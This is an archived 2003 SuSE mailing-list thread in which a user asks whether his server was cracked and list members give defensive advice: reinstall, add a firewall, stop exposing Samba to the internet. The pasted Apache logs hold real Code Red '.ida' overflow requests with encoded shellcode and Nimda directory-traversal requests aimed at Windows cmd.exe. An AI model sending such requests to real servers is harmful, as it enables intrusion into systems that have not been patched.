Re: [SLE] Has someone hacked my server? Has someone gotten root on my machine?
Thanks for all the replies. This email contains snips of my log files. There is some interesting reading, particularly the messages log. It seems a samba string overflow cause some problems from April 21 to 29 - scroll down to see the logs. Does this mean that a hacker has gotten control of my box? In a number of replies people talk about a cracker, eh, what is a cracker? And what is the different with a hacker? From: "Derek Fountain"
Do you have any reason to believe a hardware fault has occured? Any history of overheating with that box? Has it received a knock recently which might have dislodged some memory? Any reason to think the hard disk might have started to die?
I have no reason whatsoever to suspect a hardware problem. No knocks, overheating etc.
A reinstall looks like the best option in the absence of any better advice. My suspicions would lay with the hardware though. Happily running Linux boxes don't just go belly up like that without a good reason.
I think that I will reinstall the machine. Rohit writes:
I would have looked at /var/log/ directory and in relevant files there.
Thanks for this, would you suggest which file I should look at?
I looked at my mail log and guess what?
There is a huge whole in the log, everything from April 21 to 29 is gone.
Mail was running during that time.
Apparently deleted (???). Here is a snip of the log:
[snip]
Apr 21 18:00:34 linux sendmail[6307]: h3LG0Yd3006306: to=
I may be late on this, don't know if somebody already said this... But your apache log file indicates an "IIS ISAPI Overflow IDA" attack. This is an attack that exploits an IIS vulnerability. Unless you are running IIS on your Linux box, its not doing your system any harm. :-) See http://www.whitehats.com/IDS/552 <snip>
[snip] 80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET = /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%= u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u= 0000%u00=3Da HTTP/1.0" 404 629 208.25.133.10 - - [21/Apr/2003:17:43:13 +0200] "GET = /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET = /scripts/root.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET = /MSADC/root.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET = /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:55 +0200] "GET = /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET = /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET = /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir = HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET = /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir = HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET = /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt= /system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET = /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET = /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET = /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:02 +0200] "GET = /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 193.109.122.5 - - [21/Apr/2003:18:51:24 +0200] "CONNECT = 193.109.122.7:2048/ HTTP/1.1" 400 340 80.224.123.79 - - [21/Apr/2003:20:40:23 +0200] "GET = /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%= u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u= 0000%u00=3Da HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET = /scripts/root.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /MSADC/root.exe?/c+dir = HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET = /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET = /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET = /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET = /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir = HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET = /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir = HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET = /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt= /system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET = /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET = /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET = /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET = /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET = /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET = /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET = /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:21 +0200] "GET = /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.201.159.40 - - [21/Apr/2003:21:52:29 +0200] "GET = /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%= u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u= 0000%u00=3Da HTTP/1.0" 404 629 80.62.154.229 - - [21/Apr/2003:22:38:13 +0200] "GET /personal/ HTTP/1.1" = 401 477
[/snip]
<snip>>
I very very strongly encourage you to look at the book "Real World Linux Security - 2nd Ed." by Bob Toxen (ISBN 0-13-046456-2) - released in the past few months. All your questions, and a whole lot more, are answered. It also contains step-by-step howtos on hardening, and why.
On Thu, May 01, 2003 at 06:17:03PM +0200, netops@tdcadsl.dk wrote:
Thanks for all the replies. This email contains snips of my log files. There is some interesting reading, particularly the messages log. It seems a samba string > overflow cause some problems from April 21 to 29 - scroll down to > see the logs. Does this mean that a hacker has gotten control of my box?
In a number of replies people talk about a cracker, eh, what is a cracker? And what is the different with a hacker?
"Cracker" is the correct term for what you're calling a "Hacker". For a full definition: http://www.catb.org/~esr/jargon/html/entry/cracker.html http://www.catb.org/~esr/jargon/html/entry/hacker.html
No data seems to be missing from the apache access log on April 21 6pm - but there seems to be some kind of hacking attempt at that time. Here is a snip of that log:
80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629 [snip]
Looks like lots of attempts from Nimda/CodeRed and/or variants. These worms also attempt to propagate via SMB, so they might be the cause of the samba log file as well. -- David Smith Work Email: Dave.Smith@st.com STMicroelectronics Home Email: David.Smith@ds-electronics.co.uk Bristol, England GPG Key: 0xF13192F2
"Cracker" is the correct term for what you're calling a "Hacker".
If we are getting technical, shouldn't the name of this list be "suse-gnulinux-e"? (I don't think a "/" in a group name would be appropriate, would it?) Sorry, I just couldn't resist throwing that in. I try to explain the cracker/hacker and the linux vs gnu/linux thing to whoever will listen myself. Well, to anyone who uses either term when they mean the other anyhow. -- John LeMay KC2KTH Senior Enterprise Consultant NJMC | http://www.njmc.com | Phone 732-557-4848 Specializing in Microsoft and Unix based solutions
The 03.05.01 at 18:17, Dan Eskildsen wrote:
Here is a snip from the samba log file (log.smbd) . I don't understand all of this but there was activity on April 21 around 18pm I don't recognise these ip addresses.
Do you mean you have samba open to the internet? Why / What for? Another question: Do you have the firewall enabled? If you don't, after reinstalling the machine enable it and close every port to he internet you don't really need to be open from outside. -- Cheers, Carlos Robinson
Here is a snip from the samba log file (log.smbd) . I don't understand all of this but there was activity on April 21 around 18pm I don't recognise these ip addresses.
Do you mean you have samba open to the internet? Why / What for?
I have three computers that are all connected via a switch, and the switch is connected to the net, so all the machine had a direct internet connection. I wanted to transfer files between the one win2k machine and the linux box. :-( so I set up samba to do that.
Another question: Do you have the firewall enabled? If you don't,
after
reinstalling the machine enable it and close every port to he internet you don't really need to be open from outside.
-- Cheers, Carlos Robinson
-- Check the headers for your unsubscription address For additional commands send e-mail to suse-linux-e-help@suse.com Also check the archives at http://lists.suse.com Please read the FAQs: suse-linux-e-faq@suse.com
The 03.05.02 at 02:19, Dan Eskildsen wrote:
Do you mean you have samba open to the internet? Why / What for?
I have three computers that are all connected via a switch, and the switch is connected to the net, so all the machine had a direct internet connection. I wanted to transfer files between the one win2k machine and the linux box. :-( so I set up samba to do that.
Ah... I understand. But it also means that all those three machines are open to Internet, unless each one has its own firewall. It can be a nightmare... Perhaps you should add an standalone firewall to the outside. And you should check the other machines for intrusion as well. -- Cheers, Carlos Robinson
Do you mean you have samba open to the internet? Why / What for?
I have three computers that are all connected via a switch, and the switch is connected to the net, so all the machine had a direct internet connection. I wanted to transfer files between the one win2k machine and the linux box. :-( so I set up samba to do that.
So all your boxes are open to the 'net. That's bad. Really bad. You've already seen in the logs the battering the thing has taken from script kiddies and automated cracking programs. It's only the fact it's not a Windows box running IIS which let it go as long as it did. Given this information, I'd reassess my position: it's quite likely a cracker has been in there. I'm still not convinced that's the source of your problems, but it's defnitely possible. Given this now realistic possibility, there's only one to to do: get the data off it, taking *nothing executable* as you do so, and do a complete reformat and reinstall. Don't reconnect to the 'net until you have a firewall solution of some sort in place. Oh, and you might want to check the other machines on your network - if one has been cracked it's likely the rest have too. -- "...our desktop is falling behind stability-wise and feature wise to KDE ...when I went to Mexico in December to the facility where we launched gnome, they had all switched to KDE3." - Miguel de Icaza, March 2003
Do you mean you have samba open to the internet? Why / What for?
I have three computers that are all connected via a switch, and the switch is connected to the net, so all the machine had a direct internet connection. I wanted to transfer files between the one win2k machine and the linux box. :-( so I set up samba to do that.
So all your boxes are open to the 'net. That's bad. Really bad. You've already seen in the logs the battering the thing has taken from script kiddies and automated cracking programs. It's only the fact it's not a Windows box running IIS which let it go as long as it did.
Given this information, I'd reassess my position: it's quite likely a cracker has been in there. I'm still not convinced that's the source of your problems, but it's defnitely possible.
Given this now realistic possibility, there's only one to to do: get
Thanks all for the help.
Can I ask one really dumb question? How can I check where the other
machines on the network (win2k machines) have been cracked?
Regards from Denmark,
Dan
----- Original Message -----
From: "Derek Fountain"
off it, taking *nothing executable* as you do so, and do a complete reformat and reinstall. Don't reconnect to the 'net until you have a firewall solution of some sort in place. Oh, and you might want to check the other machines on your network - if one has been cracked it's likely the rest have too.
-- "...our desktop is falling behind stability-wise and feature wise to KDE ...when I went to Mexico in December to the facility where we launched gnome, they had all switched to KDE3." - Miguel de Icaza, March 2003
-- Check the headers for your unsubscription address For additional commands send e-mail to suse-linux-e-help@suse.com Also check the archives at http://lists.suse.com Please read the FAQs: suse-linux-e-faq@suse.com
On Fri, May 02, 2003 at 11:39:19AM +0200, Dan Eskildsen wrote:
Thanks all for the help.
Can I ask one really dumb question? How can I check where the other machines on the network (win2k machines) have been cracked?
With all the noise in your linux-box's logs, and the fact that your W$-boxes are exposed to the 'net'... I would personally just assume that they *were*... I have no idea how to check that on any kind of windows, but in any case you stand little or no chance of 'cleaning' up infected systems. I'd suggest something like this: 1: Get all the machines off the net 2: Backup your data 3: Build a dedicated firewall of whatever Pentium-class hardware you have and install LEAF/Bering on it: http://leaf.sourceforge.net/mod.php?mod=userpage&menu=904&page_id=21 4: Reinstall *all* your machines 5: Return to normal It may seem a little harsh, but well... ;)
Regards from Denmark,
Tak :) HTH Jon Clausen P.S. Please trim the quotes... (deleted ~70 lines just now) -- If we can't be free, at least we can be cheap!
Can I ask one really dumb question? How can I check where the other machines on the network (win2k machines) have been cracked?
This isn't the place to ask that - the skillset on this list is Linux/UNIX, not, for the most part, Windows. You'll need to find a decent Windows list or newsgroup, or failing that, hand over a pile of money to an 'expert'. Sounds like another lesson in what you can expect for free from Linux which you have to pay for under Windows. :o) If I were you I'd be inclined to reformat and reinstall everything (all at once) and put it down to experience. Even if you haven't been cracked, the fact you've left your network exposed means you can't trust it anymore. Harsh lesson - you have my sincere sympathy. -- "...our desktop is falling behind stability-wise and feature wise to KDE ...when I went to Mexico in December to the facility where we launched gnome, they had all switched to KDE3." - Miguel de Icaza, March 2003
participants (8)
-
Carlos E. R. -
Dan Eskildsen -
Dave Smith -
Derek Fountain -
Hans Forbrich -
John LeMay -
Jon Clausen -
jrn@oregonhanggliding.com